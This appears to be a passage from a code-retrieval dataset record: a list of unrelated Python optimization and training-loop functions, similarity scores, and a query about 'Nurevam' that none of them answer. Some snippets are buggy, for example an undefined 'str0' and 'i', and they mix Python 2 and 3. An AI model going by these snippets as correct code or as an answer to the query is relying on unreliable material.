pop.prepare(popSize, fun)\n loss = pop.elite.loss\n startTime = time.time()\n print(f\"[{0:7d}] Loss: {loss:<13.10g} S: {pop.scale:<12.7g} I:{PI(pop.improvements)} elapsed: {0.0:>9.6f} hours\")\n try:\n #-----------------------------------------------------------------\n for trial in range(1, maxIterations):\n pop.minimize(fun, constrainToLower=constrainToLower, constrainToUpper=constrainToUpper)\n if loss > pop.elite.loss:\n loss = pop.elite.loss\n elapsedTime = (time.time() - startTime)/(60*60)\n print(f\"[{trial:7d}] Loss: {loss:<13.10g} S: {pop.scale:<12.7g} I:{PI(pop.improvements)} elapsed: {elapsedTime:>9.6f} hours\")\n if (loss < targetLoss) or (pop.scale < minScale):\n break\n #-----------------------------------------------------------------\n except KeyboardInterrupt:\n pass\n finally:\n print(f\"\\n[{trial:7d}] Loss: {pop.elite.loss:<13.10g} S: {pop.scale:<12.7g} I:{PI(pop.improvements)} elapsed: {elapsedTime:>9.6f} hours\")\n return pop.elite", "def runIteration(self, task, Sol, Fitness, xb, fxb, A, S, Q, v, **dparams):\n\t\tfor i in range(self.NP):\n\t\t\tQ[i] = self.Qmin + (self.Qmax - self.Qmin) * self.uniform(0, 1)\n\t\t\tv[i] += (Sol[i] - xb) * Q[i]\n\t\t\tif self.rand() > self.r: S[i] = self.localSearch(best=xb, A=A[i], task=task, i=i, Sol=Sol)\n\t\t\telse: S[i] = task.repair(Sol[i] + v[i], rnd=self.Rand)\n\t\t\tFnew = task.eval(S[i])\n\t\t\tif (Fnew <= Fitness[i]) and (self.rand() < A[i]): Sol[i], Fitness[i] = S[i], Fnew\n\t\t\tif Fnew <= fxb: xb, fxb, A[i] = S[i].copy(), Fnew, self.updateLoudness(A[i])\n\t\treturn Sol, Fitness, xb, fxb, {'A': A, 'S': S, 'Q': Q, 'v': v}", "def iterate(self, update_func):\n self.pre_loop()\n logger.info('%s: start iterations', self.__class__.__name__)\n with recording_exit_reason(self.datastore):\n for gen_step in range(self.iterations):\n self.post_update(gen_step, update_func(gen_step))\n logger.info('%s: maximum iterations reached', self.__class__.__name__)", "def eval_energy(Optimizer, individ):\n #logger = initialize_logger(Optimizer.loggername)\n logger = logging.getLogger(Optimizer.loggername)\n if 'MAST' in Optimizer.calc_method:\n energy = individ.energy\n bul = individ.bulki\n signal = 'Received MAST structure\\n'\n logger.info('Received individual index = {0} from MAST with energy {1}. Returning with no evaluation'.format(\n individ.index, individ.energy))\n else:\n if Optimizer.parallel: \n rank = MPI.COMM_WORLD.Get_rank()\n logger.info('Received individual HI = {0} with energy {1} for energy evaluation'.format(\n individ.history_index, individ.energy))\n STR='----Individual ' + str(individ.history_index)+ ' Optimization----\\n'\n indiv=individ[0]\n if 'EE' in Optimizer.debug:\n debug = True\n else:\n debug = False\n if debug: \n write_xyz(Optimizer.debugfile,indiv,'Received by eval_energy')\n Optimizer.debugfile.flush()\n logger.debug('Writing recieved individual to debug file')\n # Establish individual structure for evaluation. Piece together regions when necessary.\n if Optimizer.structure=='Defect':\n indi=indiv.copy()\n bulk=individ.bulki\n nat=indi.get_number_of_atoms()\n if debug: \n logger.info('Extending defect structure to include bulk len(r1+r2)={0} len(bulk)={1}'.format(nat,len(bulk)))\n csize=bulk.get_cell() \n totalsol=Atoms(cell=csize, pbc=True)\n totalsol.extend(indi)\n totalsol.extend(bulk)\n for sym,c,m,u in Optimizer.atomlist:\n nc=len([atm for atm in totalsol if atm.symbol==sym])\n STR+='Defect configuration contains '+repr(nc)+' '+repr(sym)+' atoms\\n'\n elif Optimizer.structure=='Surface':\n totalsol=Atoms()\n totalsol.extend(indiv)\n nat=indiv.get_number_of_atoms()\n totalsol.extend(individ.bulki)\n if debug:\n logger.info('Extending surface structure to include bulk len(r1+r2)={0} len(bulk)={1}'.format(nat,len(individ.bulki)))\n for sym,c,m,u in Optimizer.atomlist:\n nc=len([atm for atm in totalsol if atm.symbol==sym])\n STR+='Surface-Bulk configuration contains '+repr(nc)+' '+repr(sym)+' atoms\\n'\n cell=numpy.maximum.reduce(indiv.get_cell())\n totalsol.set_cell([cell[0],cell[1],500])\n totalsol.set_pbc([True,True,False])\n elif Optimizer.structure=='Cluster':\n totalsol = indiv.copy()\n nat = len(totalsol)\n if debug:\n logger.info('Extending cluster with {0} atoms to center of evaluation box of size {1}'.format(nat,Optimizer.large_box_size))\n origcell = indiv.get_cell()\n totalsol.set_cell([Optimizer.large_box_size,Optimizer.large_box_size,Optimizer.large_box_size])\n totalsol.translate([Optimizer.large_box_size/2.0,Optimizer.large_box_size/2.0,Optimizer.large_box_size/2.0])\n elif Optimizer.structure=='Crystal':\n totalsol = indiv.copy()\n nat = len(totalsol)\n else:\n print 'WARNING: In EvalEnergy. Optimizer.structure not recognized'\n logger.warning('Optimizer.structure not recognized')\n \n # Check for atoms that are too close or out of constrained location\n if Optimizer.constrain_position:\n if Optimizer.structure=='Defect':\n if debug:\n logger.info('Constraining positions of defect')\n totalsol, stro = constrain_positions(totalsol, Optimizer.solidbulk, Optimizer.sf)\n if debug:\n logger.info(stro)\n STR+=str0\n min_len=0.7\n if not Optimizer.fixed_region:\n if debug:\n logger.info('Running check minimum distance')\n totalsol, STR = check_min_dist(totalsol, Optimizer.structure, nat, min_len, STR)\n if debug:\n write_xyz(Optimizer.debugfile,totalsol,'After minlength check')\n Optimizer.debugfile.flush()\n logger.debug('Writing individual after checking minimum length')\n \n # Set calculator to use to get forces/energies\n if Optimizer.parallel:\n calc = setup_calculator(Optimizer)\n if Optimizer.fixed_region:\n if debug:\n logger.info('Setting up fixed region calculator')\n pms=copy.deepcopy(calc.parameters)\n try:\n pms['mass'][len(pms['mass'])-1] += '\\ngroup RO id >= {0}\\nfix freeze RO setforce 0.0 0.0 0.0\\n'.format(nat)\n except KeyError:\n pms['pair_coeff'][0] += '\\ngroup RO id >= {0}\\nfix freeze RO setforce 0.0 0.0 0.0\\n'.format(nat)\n calc = LAMMPS(parameters=pms, files=calc.files, keep_tmp_files=calc.keep_tmp_files, tmp_dir=calc.tmp_dir)\n lmin = copy.copy(Optimizer.lammps_min)\n if debug:\n logger.info('Setting up no local minimization calculator')\n Optimizer.lammps_min = None\n Optimizer.static_calc = setup_calculator(Optimizer)\n Optimizer.lammps_min = lmin\n else:\n calc=Optimizer.calc\n totalsol.set_calculator(calc)\n totalsol.set_pbc(True)\n \n # Perform Energy Minimization\n if not Optimizer.parallel:\n if debug: \n write_xyz(Optimizer.debugfile,totalsol,'Individual sent to Energy Minimizer')\n logger.debug('Writing structure sent to energy minimizer')\n try:\n cwd = os.getcwd()\n if Optimizer.ase_min == True:\n if debug:\n logger.info('Running ASE minimizer')\n if Optimizer.calc_method=='LennardJones':\n logger.warn('Must run ase LJ calculator with pbc=False')\n totalsol.set_pbc(False)\n totalsol, energy, pressure, volume, STR = run_ase_min(totalsol, Optimizer.ase_min_fmax, Optimizer.ase_min_maxsteps, Optimizer.fitness_scheme, STR)\n else:\n if debug:\n logger.info('Running local energy calculator')\n if Optimizer.fixed_region:\n totalsol, energy, pressure, volume, STR = run_energy_eval(totalsol, Optimizer.calc_method, Optimizer.fixed_region, Optimizer.fitness_scheme, STR, Optimizer.static_calc)\n else:\n totalsol, energy, pressure, volume, STR = run_energy_eval(totalsol, Optimizer.calc_method, False, Optimizer.fitness_scheme, STR)\n except Exception, e:\n logger.critical('Error in energy evaluation: {0}'.format(e), exc_info=True)\n path = os.path.join(cwd,'TroubledLammps')\n if not os.path.exists(path):\n os.mkdir(path)\n #Copy files over\n shutil.copyfile(calc.trajfile,os.path.join(path,os.path.basename(calc.trajfile)))\n shutil.copyfile(calc.infile,os.path.join(path,os.path.basename(calc.infile)))\n shutil.copyfile(calc.logfile,os.path.join(path,os.path.basename(calc.logfile)))\n shutil.copyfile(calc.datafile,os.path.join(path,os.path.basename(calc.datafile)))\n raise RuntimeError('{0}:{1}'.format(Exception,e))\n if not Optimizer.parallel:\n if debug:\n write_xyz(Optimizer.debugfile,totalsol,'Individual after Energy Minimization')\n Optimizer.debugfile.flush()\n logger.debug('Writing structure recieved from energy minimizer')\n \n # Separate structures into distinct pieces\n if Optimizer.structure=='Defect':\n if Optimizer.fixed_region==True or Optimizer.finddefects==False:\n if debug:\n logger.info('Identifying atoms in defect structure based on ID')\n individ[0]=totalsol[0:nat]\n bul=totalsol[(nat):len(totalsol)]\n individ[0].set_cell(csize)\n else:\n if debug:\n logger.info('Applying find defects scheme to identify R1 and R2 for Defect')\n if 'FD' in Optimizer.debug:\n outt=find_defects(totalsol,Optimizer.solidbulk,Optimizer.sf,atomlistcheck=Optimizer.atomlist,trackvacs=Optimizer.trackvacs,trackswaps=Optimizer.trackswaps,debug=Optimizer.debugfile)\n else:\n outt=find_defects(totalsol,Optimizer.solidbulk,Optimizer.sf,atomlistcheck=Optimizer.atomlist,trackvacs=Optimizer.trackvacs,trackswaps=Optimizer.trackswaps,debug=False)\n individ[0]=outt[0]\n bul=outt[1]\n individ.vacancies = outt[2]\n individ.swaps = outt[3]\n STR += outt[4]\n indiv=individ[0]\n elif Optimizer.structure=='Surface':\n if debug:\n logger.info('Finding surface top layer')\n top,bul=find_top_layer(totalsol,Optimizer.surftopthick)\n indiv=top.copy()\n individ[0]=top.copy()\n bul = Atoms()\n elif Optimizer.structure=='Crystal':\n if debug:\n logger.info('Checking crystal cell type')\n celltype = check_cell_type(totalsol)\n STR+='Cell structure = {0}\\n'.format(celltype)\n bul = Atoms()\n individ[0] = totalsol.copy()\n elif Optimizer.structure=='Cluster':\n volume = get_cluster_volume(totalsol)\n bul = Atoms()\n if debug:\n logger.info('Translating cluster back to smaller box size location')\n totalsol.translate([-Optimizer.large_box_size/2.0,-Optimizer.large_box_size/2.0,-Optimizer.large_box_size/2.0])\n totalsol.set_cell(origcell)\n individ[0] = totalsol.copy()\n \n # Add concentration energy dependence\n if Optimizer.forcing=='energy_bias':\n if debug:\n logger.info('Applying energy bias for atoms with different number of atoms of type than in atomlist')\n n=[0]*len(Optimizer.atomlist)\n for i in range(len(Optimizer.atomlist)):\n n[i]=len([inds for inds in totalsol if inds.symbol==Optimizer.atomlist[i][0]])\n n[i]=abs(n[i]-Optimizer.atomlist[i][1])\n factor=sum(n)**3\n energy=(energy+factor)/totalsol.get_number_of_atoms()\n STR+='Energy with Bias = {0}\\n'.format(energy)\n elif Optimizer.forcing=='chem_pot':\n if debug:\n logger.info('Applying chemical potential bias for atoms with different number of atoms of type than in atomlist')\n n=[0]*len(Optimizer.atomlist)\n for i in range(len(Optimizer.atomlist)):\n n[i]=len([inds for inds in totalsol if inds.symbol==Optimizer.atomlist[i][0]])\n n[i]=n[i]*Optimizer.atomlist[i][3]\n factor=sum(n)\n energy=(energy+factor)/totalsol.get_number_of_atoms()\n STR+='Energy with Chemical Potential = {0}\\n'.format(energy)\n\n individ.energy=energy\n individ.buli=bul\n individ.pressure=pressure\n individ.volume=volume\n \n if Optimizer.fingerprinting:\n if debug:\n logger.info('Identifying fingerprint of new structure')\n individ.fingerprint=get_fingerprint(Optimizer,individ,Optimizer.fpbin,Optimizer.fpcutoff)\n if Optimizer.parallel:\n calc.clean()\n signal = 'Evaluated individual {0} on {1}\\n'.format(individ.index,rank)\n signal +=STR\n else:\n signal=STR\n\n return energy, bul, individ, signal", "def search_method(self): \n self.setup_problem()\n self.problem_results = minimize(self._problem, \n self.algorithm, \n self.termination,\n seed=1,\n verbose=False)\n \n self.log_debug('Core design variables determined: {}'.format(self.current_design_variables))", "def __call__(self):\n self.start()\n numberOfIterations, stateVectorConv = self.iterations()\n if numberOfIterations <= 1:\n self.answer = None\n raise DidNotConvergeWarning(\"Number of iterations <= 1.\")\n result = self.diagnostic(numberOfIterations, stateVectorConv)\n return result", "def _step1_optimization_closure(self, iteration, step):\n if iteration == self.num_iter_first_step - 1:\n reg_noise_std = 0\n else:\n reg_noise_std = (1 / 1000.) * (iteration // 300) # TODO: make it dependant in the max number of iterations\n aug = self._get_augmentation(iteration)\n if iteration == self.num_iter_first_step - 1:\n aug = 0\n # creates left_net_inputs and right_net_inputs by adding small noise\n clean_net_input = self.clean_net_inputs[aug] + (self.clean_net_inputs[aug].clone().normal_() * reg_noise_std)\n # watermark_net_input = self.watermark_net_inputs[aug] # + (self.watermark_net_input.clone().normal_())\n # mask_net_input = self.mask_net_inputs[aug]\n # applies the nets\n self.clean_net_output = self.clean_net(clean_net_input)\n self.total_loss = 0\n self.blur = 0\n self.total_loss += self.extended_l1_loss(self.clean_net_output,\n self.image_torchs[aug],\n (1 - self.watermark_hint_torchs[aug]))\n self.total_loss.backward(retain_graph=True)", "def step(self) -> ResultDict:\n # Do we have to run `self.evaluate()` this iteration?\n # `self.iteration` gets incremented after this function returns,\n # meaning that e. g. the first time this function is called,\n # self.iteration will be 0.\n evaluate_this_iter = (\n self.config.evaluation_interval is not None\n and (self.iteration + 1) % self.config.evaluation_interval == 0\n )\n\n # Results dict for training (and if appolicable: evaluation).\n results: ResultDict = {}\n\n # Parallel eval + training: Kick off evaluation-loop and parallel train() call.\n if evaluate_this_iter and self.config.evaluation_parallel_to_training:\n (\n results,\n train_iter_ctx,\n ) = self._run_one_training_iteration_and_evaluation_in_parallel()\n # - No evaluation necessary, just run the next training iteration.\n # - We have to evaluate in this training iteration, but no parallelism ->\n # evaluate after the training iteration is entirely done.\n else:\n results, train_iter_ctx = self._run_one_training_iteration()\n\n # Sequential: Train (already done above), then evaluate.\n if evaluate_this_iter and not self.config.evaluation_parallel_to_training:\n results.update(self._run_one_evaluation(train_future=None))\n\n # Attach latest available evaluation results to train results,\n # if necessary.\n if not evaluate_this_iter and self.config.always_attach_evaluation_results:\n assert isinstance(\n self.evaluation_metrics, dict\n ), \"Algorithm.evaluate() needs to return a dict.\"\n results.update(self.evaluation_metrics)\n\n if hasattr(self, \"workers\") and isinstance(self.workers, WorkerSet):\n # Sync filters on workers.\n self._sync_filters_if_needed(\n central_worker=self.workers.local_worker(),\n workers=self.workers,\n config=self.config,\n )\n # TODO (avnishn): Remove the execution plan API by q1 2023\n # Collect worker metrics and add combine them with `results`.\n if self.config._disable_execution_plan_api:\n episodes_this_iter = collect_episodes(\n self.workers,\n self._remote_worker_ids_for_metrics(),\n timeout_seconds=self.config.metrics_episode_collection_timeout_s,\n )\n results = self._compile_iteration_results(\n episodes_this_iter=episodes_this_iter,\n step_ctx=train_iter_ctx,\n iteration_results=results,\n )\n\n # Check `env_task_fn` for possible update of the env's task.\n if self.config.env_task_fn is not None:\n if not callable(self.config.env_task_fn):\n raise ValueError(\n \"`env_task_fn` must be None or a callable taking \"\n \"[train_results, env, env_ctx] as args!\"\n )\n\n def fn(env, env_context, task_fn):\n new_task = task_fn(results, env, env_context)\n cur_task = env.get_task()\n if cur_task != new_task:\n env.set_task(new_task)\n\n fn = functools.partial(fn, task_fn=self.config.env_task_fn)\n self.workers.foreach_env_with_context(fn)\n\n return results", "def runIteration(self, task, Sol, Fitness, xb, fxb, A, r, S, Q, v, **dparams):\n\t\tfor i in range(self.NP):\n\t\t\tA[i], r[i] = self.selfAdaptation(A[i], r[i])\n\t\t\tQ[i] = self.Qmin + (self.Qmax - self.Qmin) * self.uniform(0, 1)\n\t\t\tv[i] += (Sol[i] - xb) * Q[i]\n\t\t\tif self.rand() > r[i]: S[i] = self.localSearch(best=xb, A=A[i], task=task, i=i, Sol=Sol)\n\t\t\telse: S[i] = task.repair(Sol[i] + v[i], rnd=self.Rand)\n\t\t\tFnew = task.eval(S[i])\n\t\t\tif (Fnew <= Fitness[i]) and (self.rand() < (self.A_l - A[i]) / self.A): Sol[i], Fitness[i] = S[i], Fnew\n\t\t\tif Fnew <= fxb: xb, fxb = S[i].copy(), Fnew\n\t\treturn Sol, Fitness, xb, fxb, {'A': A, 'r': r, 'S': S, 'Q': Q, 'v': v}", "def run(self, function, beta):\n if self.info_requested(Info.ok):\n self.info_set(Info.ok, False)\n\n# step = function.step(beta)\n\n z = betanew = betaold = beta\n\n if self.info_requested(Info.time):\n t = []\n if self.info_requested(Info.fvalue):\n f = []\n if self.info_requested(Info.converged):\n self.info_set(Info.converged, False)\n\n for i in xrange(1, max(self.min_iter, self.max_iter) + 1):\n\n if self.info_requested(Info.time):\n tm = utils.time_cpu()\n\n z = betanew + ((i - 2.0) / (i + 1.0)) * (betanew - betaold)\n\n step = function.step(z)\n\n betaold = betanew\n betanew = function.prox(z - step * function.grad(z),\n step)\n\n if self.info_requested(Info.time):\n t.append(utils.time_cpu() - tm)\n if self.info_requested(Info.fvalue):\n f.append(function.f(betanew))\n\n if self.conesta_stop is not None:\n mu_min = self.conesta_stop[0]\n# print \"mu_min:\", mu_min\n mu_old = function.set_mu(mu_min)\n# print \"mu_old:\", mu_old\n stop_step = function.step(betanew)\n# print \"step :\", step\n # Take one ISTA step for use in the stopping criterion.\n stop_z = function.prox(betanew - stop_step \\\n * function.grad(betanew),\n stop_step)\n function.set_mu(mu_old)\n# print \"err :\", maths.norm(betanew - z)\n# print \"sc err:\", (1.0 / step) * maths.norm(betanew - z)\n# print \"eps :\", self.eps\n\n if (1. / stop_step) * maths.norm(betanew - stop_z) < self.eps \\\n and i >= self.min_iter:\n\n if self.info_requested(Info.converged):\n self.info_set(Info.converged, True)\n\n break\n\n else:\n if step > 0.0:\n if (1.0 / step) * maths.norm(betanew - z) < self.eps \\\n and i >= self.min_iter:\n\n if self.info_requested(Info.converged):\n self.info_set(Info.converged, True)\n\n break\n\n else: # TODO: Fix this!\n if maths.norm(betanew - z) < self.eps \\\n and i >= self.min_iter:\n\n if self.info_requested(Info.converged):\n self.info_set(Info.converged, True)\n\n break\n\n self.num_iter = i\n\n if self.info_requested(Info.num_iter):\n self.info_set(Info.num_iter, i)\n if self.info_requested(Info.time):\n self.info_set(Info.time, t)\n if self.info_requested(Info.fvalue):\n self.info_set(Info.fvalue, f)\n if self.info_requested(Info.ok):\n self.info_set(Info.ok, True)\n\n return betanew", "def run(self):\n results = self._optimization.run()\n self._optimization.sim.fdtd.close()\n \n # plot optimization recap figure\n plt.show()\n \n return [results[0], np.array(results[1])]", "def optimize(w, b, X, Y, num_iterations,learning_rate,print_cost = False):\n costs = []\n for i in range(num_iterations):\n\n # Cost and gradient calculation (≈ 1-4 lines of code)\n ### START CODE HERE ###\n grads,cost = propagate(w,b,X,Y)\n ### END CODE HERE ###\n\n # Retrieve derivatives from grads\n dw = grads[\"dw\"]\n db = grads[\"db\"]\n\n # update rule (≈ 2 lines of code)\n ### START CODE HERE ###\n w = w - learning_rate*dw\n b = b - learning_rate*db\n ### END CODE HERE ###\n\n # Record the costs\n if i % 100 == 0:\n costs.append(cost)\n\n # Print the cost every 100 training examples\n if print_cost and i%100==0:\n print(\"Cost after iteration %i: %f\"%(i,cost))\n\n params = {\n \"w\":w,\n \"b\":b\n }\n grads = {\n \"dw\":dw,\n \"db\":db\n }\n return params,grads,costs", "def solve(self, **kwargs) -> OptimizationResult:\n raise NotImplementedError", "def optimize(self, maxiter):\n for iteration in range(maxiter):\n self.sortParticles()\n self.phi = int(phiMin + iteration *((phiMax - phiMin) / float(maxiter)))\n self.cluster()\n #self.ConnectClusters()\n for i in range(self.n_particles):\n x = self.particles_pos[i]\n v = self.velocities[i]\n p_best = self.p_best[i]\n self.velocities[i] = self.update_velocity(x, v, p_best , self.g_best , self.getLbestOfCluster(self.getClusterOfParticle(i)) , i)\n self.particles_pos[i] = self.update_position(x, v)\n # Update the best position for particle i\n if self.func(self.particles_pos[i]) < self.func(p_best):\n self.p_best[i] = self.particles_pos[i]\n # Update the best position overall\n if self.func(self.particles_pos[i]) < self.func(self.g_best):\n \n self.g_best = self.particles_pos[i]\n return self.g_best, self.func(self.g_best)", "def run():\n return estimate(0,1,0)", "def optimize(self, startPoint=0, epsilon=1e-5, maxIterations=100):\n n = len(startPoint)\n alpha = 1\n Hk = numpy.eye(n)\n I = numpy.eye(n)\n k = 0\n xk = startPoint\n gk = self.g(xk)\n \n while 1:\n # Compute the norm of the gradient.\n gradNorm = numpy.sqrt(numpy.dot(gk, gk))\n\n # Display the function value for the current iteration.\n fk = f(xk)\n print \"%d: fval = %d, norm = %f\" % (k, fk, gradNorm) \n \n # Termination based on tolerenace criterion.\n if (gradNorm <= epsilon):\n print \"Terminating: Tolerence %f (fval = %f, norm = %f)\"\\\n % (epsilon, fk, gradNorm)\n return {'optimalPoint':xk, 'functVal':fk}\n\n # Termination due to maximum iterations.\n if (k > maxIterations):\n print \"Terminating: Max iterations %d (fval = %f, norm = %f)\" \\\n % (i, fk, gradNorm) \n return {'optimalPoint':xk, 'functVal':fk}\n\n # Computing the search direction.\n pk = -numpy.dot(Hk, gk)\n sk = alpha * pk\n xk1 = xk + sk\n gk1 = self.g(xk1)\n yk = gk1 - gk\n\n # Computing Hk1.\n rhok = 1.0 / numpy.dot(yk, sk)\n A = I - (rhok * numpy.outer(sk, yk))\n B = rhok * numpy.outer(sk, sk)\n Hk = numpy.dot(numpy.dot(A, Hk), A) + B\n\n # Update the variables for the next iteration.\n xk = xk1\n gk = gk1\n k += 1\n pass \n pass", "def value_iteration(self):\n #Create a utility function of the environment shape\n gamma = 0.9\n epsilon = 0.01\n iteration = 0\n\n #create a utility function that matches the size of the number of states\n u = np.zeros(self.env.observation_space.n, dtype=float)\n\n u_copy = u.copy()\n\n #Create the reward grid\n reward = np.array([state_map.get(sublist) for state in frozen_lake.MAPS[self.env.spec._kwargs.get('map_name')] for sublist in state])\n\n T = self.frozen_transition()\n\n graph_list = list()\n\n #keep track of the convergence\n policy_convergence = list()\n\n while True:\n delta = 0\n iteration += 1\n u = u_copy.copy()\n graph_list.append(u)\n start_time = time()\n for s in range(self.env.observation_space.n):\n r = reward[s]\n v = np.zeros((1, self.env.observation_space.n), dtype=float)\n v[0, s] = 1.0\n u_copy[s] = self.return_state_utility(v, T, u, r, gamma)\n delta = max(delta, np.abs(u_copy[s] - u[s]))\n policy_convergence.append({'iter': iteration, 'delta': delta})\n if delta < epsilon * (1 - gamma) / gamma:\n print(\"Total Iterations: {}\".format(iteration))\n print(\"=================== VALUE ITERATION RESULT ==================\")\n print(\"Iterations: \" + str(iteration))\n print(\"Delta: \" + str(delta))\n print(\"Gamma: \" + str(gamma))\n print(\"Epsilon: \" + str(epsilon))\n print(\"Time to converge: {} seconds\".format(time() - start_time))\n print(\"===================================================\")\n utility_reshape = np.reshape(u, (int(np.sqrt(self.env.observation_space.n)), int(np.sqrt(self.env.observation_space.n))))\n print (np.array(utility_reshape, dtype=float))\n print(\"===================================================\")\n break\n\n return u", "def algorithm(self):\n convergence_threshold = 50\n reward_num_threshold = 300\n alpha = 1\n gamma = 0.5\n while (self.reward_num < reward_num_threshold) and (self.count<convergence_threshold):\n print('------')\n print('Iteration', self.reward_num, '/', reward_num_threshold)\n print('Iterations w/out Q-update:', self.count, '/', convergence_threshold)\n # select a possible action (any of them; all are valid)\n s = self.get_state_num()\n print(\"Initial state:\", s)\n a = random.choice(np.arange(3))\n self.apply_action(a)\n while self.reward == None:\n #print(\"Sleeping to wait for reward\")\n rospy.sleep(0.5)\n reward = self.reward\n print(\"REWARD =\", reward)\n self.reward = None\n if reward == 0:\n next_state = self.get_state_num()\n mx = np.amax(self.Q[next_state])\n else:\n ## There is no next state if nonzero reward seen\n mx = 0\n update = self.Q[s][a] + alpha*(reward+gamma*mx-self.Q[s][a])\n if self.Q[s][a] != update:\n print(\"Update Q matrix\")\n self.Q[s][a] = update\n self.count = 0\n else:\n self.count += 1\n\n print(\"Finished calculating Q-Matrix\\n\\n\\n\\n\\n\\n\\n\")", "def experiment_callback(self, args):\n # If args is None, that means that an exception was raised during the\n # execution of the experiment. In such case, ignore it\n if not args:\n self.n_fail += 1\n return\n # Extract parameters\n params, results, duration = args\n self.n_success += 1\n # Store results\n self.results.add(params, results)\n self.exp_durations.append(duration)\n if self.n_success % self.summary_freq == 0:\n # Number of experiments scheduled to be executed\n n_scheduled = self.n_exp - (self.n_fail + self.n_success)\n # Compute ETA\n n_cores = min(mp.cpu_count(), self.n_proc)\n mean_duration = sum(self.exp_durations) / len(self.exp_durations)\n eta = timestr(n_scheduled * mean_duration / n_cores, False)\n # Print summary\n logger.info('SUMMARY | Completed: %d, Failed: %d, Scheduled: %d, ETA: %s',\n self.n_success, self.n_fail, n_scheduled, eta)", "def optimize_self(self):\n self.compute_predicate_values();\n \"\"\" Firstly,adjust the f(x) into > alpha_0; \"\"\"\n for i in range(len(self.RING_PARA_PAIR_CD)):\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CD[i]);\n self.RING_PARA_PAIR_CD[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CD[i][0].WORD_ID]; # 更新内部VECTOR;\n self.RING_PARA_PAIR_CD[i][2] = self.RING_PARA_PAIR_CD[i][0].polynomial_func(self.RING_PARA_PAIR_CD[i][1]); # 更新内部ALPHA;\n for i in range(len(self.RING_PARA_PAIR_CC)):\n # ************** BUG 0627 **********************\n # if self.RING_PARA_PAIR_CC[i][2]<41 and self.RING_PARA_PAIR_CC[i][2]>40: # ---------------------------------------------------------------->>>>>\n # print( RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID] ); # ---------------------------------------------------------------->>>>>\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CC[i]); \n # ************** BUG 0627 **********************\n # if self.RING_PARA_PAIR_CC[i][2]<41 and self.RING_PARA_PAIR_CC[i][2]>40: # ---------------------------------------------------------------->>>>> \n # print(self.RING_PARA_PAIR_CC[i][0].VECTOR); # ---------------------------------------------------------------->>>>>\n # print(RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID]); # ---------------------------------------------------------------->>>>>\n # print(self.RING_PARA_PAIR_CC[i][0].polynomial_func(self.RING_PARA_PAIR_CC[i][1])); # ---------------------------------------------------------------->>>>>\n # print( np.cumprod( self.RING_PARA_PAIR_CC[i][1] - self.RING_PARA_PAIR_CC[i][0].VECTOR )[-1] ); # ---------------------------------------------------------------->>>>>\n self.RING_PARA_PAIR_CC[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID]; # 更新内部VECTOR;\n self.RING_PARA_PAIR_CC[i][2] = self.RING_PARA_PAIR_CC[i][0].polynomial_func(self.RING_PARA_PAIR_CC[i][1]); # 更新内部ALPHA;\n \"\"\" Secondly,adjust the alpha_0 < p_min(y_n) < q_min(x_n)\"\"\" \n P_MIN = 99999999.0; Q_MIN = 99999999.0;P_MAX = 0.0;Q_MAX = 0.0;\n CD_ID = 0;CD_MIN=0;\n # 找到结论中谓词的最小多项式值\n for RING_PARA_PAIR in self.RING_PARA_PAIR_CC:\n if Q_MIN>RING_PARA_PAIR[2]: Q_MIN=RING_PARA_PAIR[2];\n # if Q_MAX<RING_PARA_PAIR[2]: Q_MAX=RING_PARA_PAIR[2];\n # 不满足小于结论最小值的那些环的TARGET_ALPHA更新; \n for RING_PARA_PAIR in self.RING_PARA_PAIR_CD:\n if P_MIN>RING_PARA_PAIR[2]: P_MIN=RING_PARA_PAIR[2];CD_MIN=CD_ID;# self.RING_PARA_PAIR_CD[CD_ID][3]=-Q_MIN;\n # if P_MAX<RING_PARA_PAIR[2]: P_MAX=RING_PARA_PAIR[2];self.RING_PARA_PAIR_CD[CD_ID][3]=-Q_MAX;\n CD_ID+=1;\n self.RING_PARA_PAIR_CD[CD_MIN][3]=-Q_MIN; \n # 优化不满足小于结论最小值的那些环 \n for i in range(len(self.RING_PARA_PAIR_CD)): \n if self.RING_PARA_PAIR_CD[i][3]!=ALPHA:\n if P_MIN>Q_MIN:\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CD[i]); \n self.RING_PARA_PAIR_CD[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CD[i][0].WORD_ID]; # 更新内部VECTOR;\n self.RING_PARA_PAIR_CD[i][2] = self.RING_PARA_PAIR_CD[i][0].polynomial_func(self.RING_PARA_PAIR_CD[i][1]); # 更新内部ALPHA;" ]
[ "0.65901256", "0.6476958", "0.64748776", "0.639814", "0.63832265", "0.6313094", "0.6264372", "0.6213871", "0.6205301", "0.61710924", "0.6140338", "0.6129752", "0.60806435", "0.6051773", "0.6009665", "0.60076827", "0.60076827", "0.5998235", "0.59467274", "0.5933865", "0.59092945", "0.5902032", "0.5897183", "0.58852327", "0.58791524", "0.5870821", "0.587045", "0.58695805", "0.5826524", "0.58217716", "0.5811564", "0.58035845", "0.57533544", "0.57514393", "0.57400596", "0.5728194", "0.5716536", "0.5714253", "0.5691625", "0.56797856", "0.5678571", "0.5673598", "0.5673598", "0.5673598", "0.56608415", "0.565868", "0.5620482", "0.5611053", "0.5607042", "0.56070036", "0.56066334", "0.56029123", "0.5579653", "0.557771", "0.5566541", "0.5564588", "0.55512685", "0.5538573", "0.5522365", "0.5516557", "0.5514994", "0.551131", "0.5507184", "0.54994106", "0.5497955", "0.54953885", "0.5484313", "0.54802305", "0.54674804", "0.546602", "0.545959", "0.5452608", "0.5442806", "0.5436651", "0.5433038", "0.5431733", "0.54188627", "0.5415806", "0.5414562", "0.5409718", "0.54096365", "0.5408973", "0.54072285", "0.54042345", "0.54035723", "0.54016334", "0.54009604", "0.5389468", "0.5389379", "0.53853405", "0.5384501", "0.53743196", "0.5370644", "0.5367415", "0.5362922", "0.5360071", "0.5356477", "0.5356105", "0.5351363", "0.534829", "0.53475076" ]
0.0
-1
About Nurevam or person by mention info
